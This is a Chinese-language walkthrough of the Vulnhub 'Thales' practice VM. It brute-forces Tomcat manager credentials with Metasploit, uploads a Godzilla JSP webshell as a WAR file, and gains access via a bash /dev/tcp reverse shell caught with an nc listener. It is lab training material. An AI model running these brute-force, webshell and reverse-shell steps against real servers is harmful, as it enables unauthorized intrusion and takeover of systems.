Thales靶机攻略
1.下载导入VBox,并启动靶机
靶机地址:https://download.vulnhub.com/thales/Thales.zip
解压后,在VBox中导入虚拟电脑。包含所有网卡的MAC地址。
导入完成,设置网卡模式为仅主机网络。开启靶机。
kali网卡更改为桥接模式。点击工具栏的“编辑”----"虚拟网络编辑器",再点击右下角的“更改设置”,选择桥接网卡,修改已桥接至:VBox Host-Only 网卡,便于搜索靶机IP。点击应用----稍等一下,再点击确认。
先关闭后开启网络服务:systemctl stop networking systemctl start networking
查看kali的ip:发现是192.168.56.102
2.使用kali,扫描局域网内的主机,判断靶机的ip
扫描命令:nmap 192.168.56.1/24 且只有22和8080端口开启
3.访问靶机的8080端口
访问:http://192.168.56.101:8080
发现页面是Apache Tomcat小猫页面,存在管理员登录。
4. 登录需要爆破用户名和密码,使用msf进行操作
kali进入msf:msfconsole 【执行命令后,需要等待运行一下】
注意:如果没msfconfig命令,请先安装。建议是:先更新一下apt,即apt update。如果更新过,则忽略更新这一步。再安装需要的命令:apt install msfconfig。
输入search tomcat login,进行设置后完成爆破。
设置1:use 0 使用这个方法
设置2:输入 show options,查看必须填写的信息 。
发现RHost、RPort 目标主机和目标端口必须设置
设置主机:set rhost 192.168.56.101,可访问端口只有8080,可以设置也可以不设置。
输入run运行程序,爆破用户名和密码:tomcat:role1
输入:exit,退出msf
5.使用爆破的用户名和密码,管理App登录
6. 发现可上传WAR包,进行上传木马操作
使用哥斯拉生成jsp木马文件,压缩成zip文件。修改压缩包后缀为.war。
上传war文件,点击部署。
7.访问上传的木马文件
访问:http://192.168.56.101:8080/webshell/webshell.jsp
访问成功。
8.使用哥斯拉进行连接
目标”添加“----写入木马url,选择木马类型,点击测试连接。连接成功。
点击添加。
9.反弹shell
右击连接--进入。选择命令执行。
执行反弹shell命令:/bin/bash -c 'bash -i >& /dev/tcp/192.168.56.102/6688 0>&1'
这里是攻击者的ip,即kali的ip。
执行前,kali先进行监听:nc -lvvp 6688
执行反弹shell,kali监听收到了shell。执行whoami,可以看到是tomcat,成功。
Thales靶机练习结束。
本次靶机,对于网卡的配置很重要,也是重中之重。
这里使用msf进行爆破用户名和密码,是一种暴力破解工具。
靶机结束,剩余部分还未学到。不做说明。
希望对于困惑的朋友,可以有所帮助。当然也希望大家都最好能有所收获。
再见。。。
--------------------2025/3/25 23:17